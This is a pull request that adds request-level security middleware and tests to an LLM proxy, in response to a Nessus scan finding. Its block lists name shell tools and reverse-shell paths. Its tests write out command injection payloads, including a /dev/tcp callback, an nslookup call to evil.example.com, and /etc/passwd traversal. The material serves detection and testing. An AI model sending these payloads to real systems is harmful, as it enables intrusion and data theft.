### PR TITLE
fix: add request-level security middleware to block command injection

### DIFF
--- a/src/argoproxy/app.py
+++ b/src/argoproxy/app.py
@@ -19,6 +19,7 @@ from .performance import (
     OptimizedHTTPSession,
     get_performance_config,
 )
+from .utils.attack_logger import security_middleware
 from .utils.logging import log_debug, log_error, log_info, log_warning
 
 
@@ -320,7 +321,10 @@ def create_app():
     # Set client_max_size to 100MB to handle large image payloads from remote clients
     # Users may send images larger than the gateway's 20MB limit; argo-proxy will
     # compress them before forwarding. Default aiohttp limit is 1MB which is too small.
-    app = web.Application(client_max_size=100 * 1024 * 1024)
+    app = web.Application(
+        client_max_size=100 * 1024 * 1024,
+        middlewares=[security_middleware],
+    )
     app.on_startup.append(prepare_app)
     app.on_shutdown.append(cleanup_app)
 

--- a/src/argoproxy/utils/attack_logger.py
+++ b/src/argoproxy/utils/attack_logger.py
@@ -4,6 +4,7 @@ This module provides functionality to:
 1. Log attack attempts with concise warning messages
 2. Save detailed attack information to files for analysis
 3. Organize logs by date in a dedicated directory
+4. Block malicious requests at the application level via middleware
 """
 
 import gzip
@@ -13,6 +14,9 @@ import traceback
 from datetime import datetime
 from pathlib import Path
 from typing import Any
+from urllib.parse import unquote
+
+from aiohttp import web
 
 from .logging import log_warning
 
@@ -65,6 +69,19 @@ class AttackLogger:
             "javascript:",
             "onerror=",
             "onload=",
+        ],
+        "command_injection": [
+            "$(",
+            "/bin/bash",
+            "/bin/sh",
+            "/bin/zsh",
+            "cmd.exe",
+            "powershell",
+            "/dev/tcp/",
+            "/dev/udp/",
+            "nslookup ",
+            "curl ",
+            "wget ",
         ],
     }
 
@@ -219,6 +236,12 @@ class AttackFilter(logging.Filter):
         "${{",
         "${#",
         "%24%7B",
+        # Command injection
+        "$(",
+        "/bin/bash",
+        "/bin/sh",
+        "/dev/tcp/",
+        "/dev/udp/",
     ]
 
     def __init__(self, attack_logger: AttackLogger):
@@ -304,6 +327,126 @@ class AttackFilter(logging.Filter):
             if pattern in text:
                 return pattern
         return "unknown"
+
+
+# ---------------------------------------------------------------------------
+# Request-level security middleware
+# ---------------------------------------------------------------------------
+
+# Patterns checked against URL-decoded path + query string on every request.
+# These are high-confidence indicators — unlikely to appear in legitimate
+# LLM API traffic, so false-positive risk is low.
+_REQUEST_ATTACK_PATTERNS: dict[str, list[str]] = {
+    "command_injection": [
+        "$(",  # bash subshell: $(cmd)
+        "`",  # backtick command substitution
+        "/bin/bash",
+        "/bin/sh",
+        "/bin/zsh",
+        "cmd.exe",
+        "powershell",
+        "/dev/tcp/",
+        "/dev/udp/",
+    ],
+    "struts2_ognl": [
+        "xwork.MethodAccessor",
+        "_memberAccess",
+        "allowStaticMethodAccess",
+        "java.lang.Runtime",
+        "org.apache.struts2",
+    ],
+    "directory_traversal": [
+        "././././",
+        "../../../",
+    ],
+    "ssti_probe": [
+        "${{",
+        "${#",
+    ],
+    "xss_probe": [
+        "<script>",
+        "javascript:",
+    ],
+}
+
+
+def _decode_url(raw: str) -> str:
+    """URL-decode a string, applying up to 2 rounds to catch double-encoding.
+
+    Args:
+        raw: Raw URL string.
+
+    Returns:
+        Decoded string.
+    """
+    decoded = unquote(raw)
+    # Second pass for double-encoded payloads like %2524%2528 -> %24%28 -> $(
+    second = unquote(decoded)
+    return second if second != decoded else decoded
+
+
+def _detect_request_attack(url_decoded: str) -> str | None:
+    """Check a decoded URL string against request-level attack patterns.
+
+    Args:
+        url_decoded: URL-decoded path + query string.
+
+    Returns:
+        Attack type string if matched, None otherwise.
+    """
+    url_lower = url_decoded.lower()
+    for attack_type, patterns in _REQUEST_ATTACK_PATTERNS.items():
+        for pattern in patterns:
+            if pattern.lower() in url_lower:
+                return attack_type
+    return None
+
+
+@web.middleware
+async def security_middleware(
+    request: web.Request,
+    handler,
+) -> web.StreamResponse:
+    """Application-level middleware that blocks requests with malicious payloads.
+
+    This complements the AttackFilter (which catches parser-level errors) by
+    inspecting syntactically valid HTTP requests before they reach handlers.
+    The URL path and query string are URL-decoded before pattern matching.
+
+    Args:
+        request: The incoming aiohttp request.
+        handler: The next handler in the middleware chain.
+
+    Returns:
+        A 403 response if an attack is detected, otherwise the handler response.
+    """
+    # Decode and inspect path + query string
+    raw_url = request.path_qs
+    decoded_url = _decode_url(raw_url)
+    attack_type = _detect_request_attack(decoded_url)
+
+    if attack_type is not None:
+        # Extract remote IP
+        peername = (
+            request.transport.get_extra_info("peername") if request.transport else None
+        )
+        remote_ip = peername[0] if peername else request.remote or "unknown"
+
+        # Log via AttackLogger
+        attack_logger = get_attack_logger()
+        attack_logger.log_attack(
+            remote_ip=remote_ip,
+            raw_request=f"{request.method} {raw_url}",
+            error_type="blocked_by_middleware",
+            error_message=f"Request blocked: {attack_type} pattern in URL",
+        )
+
+        return web.json_response(
+            {"error": "Forbidden"},
+            status=403,
+        )
+
+    return await handler(request)
 
 
 # Global attack logger instance

--- a/src/argoproxy/utils/attack_logger.py
+++ b/src/argoproxy/utils/attack_logger.py
@@ -35,7 +35,11 @@ class AttackLogger:
         enabled: Whether attack logging is enabled.
     """
 
-    # Known attack patterns for classification
+    # Broadest pattern set — used to classify attack type from raw request data.
+    # Includes generic terms (nslookup, curl, wget) that would false-positive in
+    # URL matching but are fine for post-hoc classification of parser-rejected requests.
+    # See also: AttackFilter.ATTACK_PATTERNS (log filter) and _REQUEST_ATTACK_PATTERNS
+    # (middleware) — each has a narrower scope suited to its context.
     ATTACK_TYPES = {
         "struts2_ognl": [
             "xwork.MethodAccessor.denyMethodExecution",
@@ -222,7 +226,10 @@ class AttackFilter(logging.Filter):
         "http_exceptions",
     ]
 
-    # Attack payload patterns
+    # Subset of patterns matched against aiohttp parser exception text.
+    # Narrower than ATTACK_TYPES — only patterns that actually appear in parser
+    # error messages. See also: ATTACK_TYPES (classifier) and
+    # _REQUEST_ATTACK_PATTERNS (middleware).
     ATTACK_PATTERNS = [
         # Struts2 OGNL
         "xwork.MethodAccessor",
@@ -333,9 +340,11 @@ class AttackFilter(logging.Filter):
 # Request-level security middleware
 # ---------------------------------------------------------------------------
 
-# Patterns checked against URL-decoded path + query string on every request.
-# These are high-confidence indicators — unlikely to appear in legitimate
-# LLM API traffic, so false-positive risk is low.
+# Strictest pattern set — checked against URL-decoded path + query string on
+# every inbound request. Only high-confidence indicators that are unlikely to
+# appear in legitimate LLM API URLs. All patterns must be lowercase (the URL
+# is lowercased before matching). See also: ATTACK_TYPES (classifier) and
+# AttackFilter.ATTACK_PATTERNS (log filter) for the broader lists.
 _REQUEST_ATTACK_PATTERNS: dict[str, list[str]] = {
     "command_injection": [
         "$(",  # bash subshell: $(cmd)

--- a/src/argoproxy/utils/attack_logger.py
+++ b/src/argoproxy/utils/attack_logger.py
@@ -339,7 +339,9 @@ class AttackFilter(logging.Filter):
 _REQUEST_ATTACK_PATTERNS: dict[str, list[str]] = {
     "command_injection": [
         "$(",  # bash subshell: $(cmd)
-        "`",  # backtick command substitution
+        # Backtick command substitution — most aggressive single-char pattern.
+        # Extremely rare in legitimate LLM API URLs; check here first on false positives.
+        "`",
         "/bin/bash",
         "/bin/sh",
         "/bin/zsh",
@@ -347,17 +349,19 @@ _REQUEST_ATTACK_PATTERNS: dict[str, list[str]] = {
         "powershell",
         "/dev/tcp/",
         "/dev/udp/",
+        # nslookup/curl/wget are in ATTACK_TYPES for classification but intentionally
+        # excluded here — too generic for URL matching and would cause false positives.
     ],
     "struts2_ognl": [
-        "xwork.MethodAccessor",
-        "_memberAccess",
-        "allowStaticMethodAccess",
-        "java.lang.Runtime",
+        "xwork.methodaccessor",
+        "_memberaccess",
+        "allowstaticmethodaccess",
+        "java.lang.runtime",
         "org.apache.struts2",
     ],
     "directory_traversal": [
         "././././",
-        "../../../",
+        "../../../",  # requires 3+ levels to avoid false positives on relative paths
     ],
     "ssti_probe": [
         "${{",
@@ -379,10 +383,8 @@ def _decode_url(raw: str) -> str:
     Returns:
         Decoded string.
     """
-    decoded = unquote(raw)
-    # Second pass for double-encoded payloads like %2524%2528 -> %24%28 -> $(
-    second = unquote(decoded)
-    return second if second != decoded else decoded
+    # Two passes to catch double-encoded payloads like %2524%2528 -> %24%28 -> $(
+    return unquote(unquote(raw))
 
 
 def _detect_request_attack(url_decoded: str) -> str | None:
@@ -395,9 +397,10 @@ def _detect_request_attack(url_decoded: str) -> str | None:
         Attack type string if matched, None otherwise.
     """
     url_lower = url_decoded.lower()
+    # Patterns are lowercase literals — no need to call .lower() on them.
     for attack_type, patterns in _REQUEST_ATTACK_PATTERNS.items():
         for pattern in patterns:
-            if pattern.lower() in url_lower:
+            if pattern in url_lower:
                 return attack_type
     return None
 

--- a/tests/test_security_middleware.py
+++ b/tests/test_security_middleware.py
@@ -1,0 +1,161 @@
+"""Tests for the request-level security middleware.
+
+Verifies that malicious payloads in URLs are blocked before reaching handlers,
+while legitimate requests pass through.
+"""
+
+from aiohttp import web
+from aiohttp.test_utils import AioHTTPTestCase
+
+from argoproxy.utils.attack_logger import security_middleware
+
+
+async def _ok_handler(request: web.Request) -> web.Response:
+    """Simple handler that returns 200 OK."""
+    return web.json_response({"status": "ok"})
+
+
+def _create_test_app() -> web.Application:
+    """Create a minimal app with security middleware and a catch-all route."""
+    app = web.Application(middlewares=[security_middleware])
+    app.router.add_route("*", "/{path:.*}", _ok_handler)
+    return app
+
+
+# ---------------------------------------------------------------------------
+# Legitimate requests — should pass through (200)
+# ---------------------------------------------------------------------------
+
+
+class TestLegitimateRequests(AioHTTPTestCase):
+    """Ensure normal API traffic is not blocked."""
+
+    async def get_application(self):
+        return _create_test_app()
+
+    async def test_normal_api_path(self):
+        resp = await self.client.get("/api/v1/models")
+        assert resp.status == 200
+
+    async def test_normal_query_params(self):
+        resp = await self.client.get("/api/chat?model=gpt-4&stream=true")
+        assert resp.status == 200
+
+    async def test_json_post(self):
+        resp = await self.client.post(
+            "/v1/chat/completions",
+            json={"model": "gpt-4", "messages": [{"role": "user", "content": "hello"}]},
+        )
+        assert resp.status == 200
+
+    async def test_health_check(self):
+        resp = await self.client.get("/health")
+        assert resp.status == 200
+
+    async def test_well_known(self):
+        resp = await self.client.get("/.well-known/jwks.json")
+        assert resp.status == 200
+
+
+# ---------------------------------------------------------------------------
+# Command injection — should be blocked (403)
+# ---------------------------------------------------------------------------
+
+
+class TestCommandInjection(AioHTTPTestCase):
+    """Verify command injection payloads are blocked."""
+
+    async def get_application(self):
+        return _create_test_app()
+
+    async def test_subshell_in_query(self):
+        """The exact payload from the Nessus scan."""
+        resp = await self.client.get(
+            '/api/getServices?name[]=$(/bin/bash -c "nslookup evil.example.com")'
+        )
+        assert resp.status == 403
+
+    async def test_bash_devtcp_in_query(self):
+        """Reverse shell via /dev/tcp."""
+        resp = await self.client.get(
+            '/api/getServices?name[]=$(bash -c "echo pwned >/dev/tcp/1.2.3.4/4444")'
+        )
+        assert resp.status == 403
+
+    async def test_backtick_injection(self):
+        resp = await self.client.get("/api/search?q=`id`")
+        assert resp.status == 403
+
+    async def test_url_encoded_subshell(self):
+        """URL-encoded $( should be decoded and caught."""
+        resp = await self.client.get("/api/search?q=%24%28id%29")
+        assert resp.status == 403
+
+    async def test_double_encoded_subshell(self):
+        """Double URL-encoded $( should still be caught."""
+        resp = await self.client.get("/api/search?q=%2524%2528id%2529")
+        assert resp.status == 403
+
+    async def test_bin_sh_in_query(self):
+        resp = await self.client.get("/api/run?cmd=/bin/sh+-c+id")
+        assert resp.status == 403
+
+    async def test_powershell_in_query(self):
+        resp = await self.client.get("/api/run?cmd=powershell+-enc+base64payload")
+        assert resp.status == 403
+
+    async def test_cmd_exe_in_query(self):
+        resp = await self.client.get("/api/run?cmd=cmd.exe+/c+dir")
+        assert resp.status == 403
+
+
+# ---------------------------------------------------------------------------
+# Other attack types — should be blocked (403)
+# ---------------------------------------------------------------------------
+
+
+class TestOtherAttackTypes(AioHTTPTestCase):
+    """Verify other attack patterns are blocked at request level."""
+
+    async def get_application(self):
+        return _create_test_app()
+
+    async def test_directory_traversal_in_query(self):
+        resp = await self.client.get("/api/file?path=../../../etc/passwd")
+        assert resp.status == 403
+
+    async def test_struts2_ognl(self):
+        resp = await self.client.get(
+            "/api?class.module.classLoader.URLs%5B0%5D=java.lang.Runtime"
+        )
+        assert resp.status == 403
+
+    async def test_ssti_probe(self):
+        resp = await self.client.get("/api/search?q=${{7*7}}")
+        assert resp.status == 403
+
+    async def test_xss_script_tag(self):
+        resp = await self.client.get("/api/search?q=<script>alert(1)</script>")
+        assert resp.status == 403
+
+    async def test_xss_javascript_proto(self):
+        resp = await self.client.get("/api/redirect?url=javascript:alert(1)")
+        assert resp.status == 403
+
+
+# ---------------------------------------------------------------------------
+# Response format
+# ---------------------------------------------------------------------------
+
+
+class TestResponseFormat(AioHTTPTestCase):
+    """Verify the blocked response format."""
+
+    async def get_application(self):
+        return _create_test_app()
+
+    async def test_blocked_response_body(self):
+        resp = await self.client.get('/api/getServices?name[]=$(/bin/bash -c "whoami")')
+        assert resp.status == 403
+        body = await resp.json()
+        assert body == {"error": "Forbidden"}


### PR DESCRIPTION
## Summary

- Add `security_middleware` (aiohttp `@web.middleware`) that inspects URL path + query string on every inbound request before it reaches handlers
- Add `command_injection` as a new attack type with patterns for `$(`, `/bin/bash`, `/bin/sh`, backticks, `powershell`, `cmd.exe`, `/dev/tcp/`, etc.
- URL-decode requests (2 rounds for double-encoding like `%2524%2528` → `$(`) before pattern matching
- Only URL is checked — request bodies are untouched, so LLM tool call payloads containing shell commands are not affected
- Middleware applies to both dev mode and production mode

### Background

Nessus vulnerability scan from inside Argonne network revealed that command injection payloads in query strings (e.g. `?name[]=$(/bin/bash -c "nslookup ...")`) bypassed the existing `AttackFilter`. The filter only catches attacks that cause aiohttp parser errors — syntactically valid URLs with malicious query params passed through to the dev proxy and were forwarded upstream.

## Test plan

- [x] 19 new tests in `tests/test_security_middleware.py`
  - 5 legitimate request tests (normal paths, query params, POST, health, .well-known) → 200 OK
  - 8 command injection tests (subshell, backticks, URL-encoded, double-encoded, /bin/sh, powershell, cmd.exe) → 403
  - 5 other attack types (directory traversal, struts2, SSTI, XSS) → 403
  - 1 response format test (403 body = `{"error": "Forbidden"}`)
- [x] All pre-commit hooks pass (ruff, ruff format, ty check)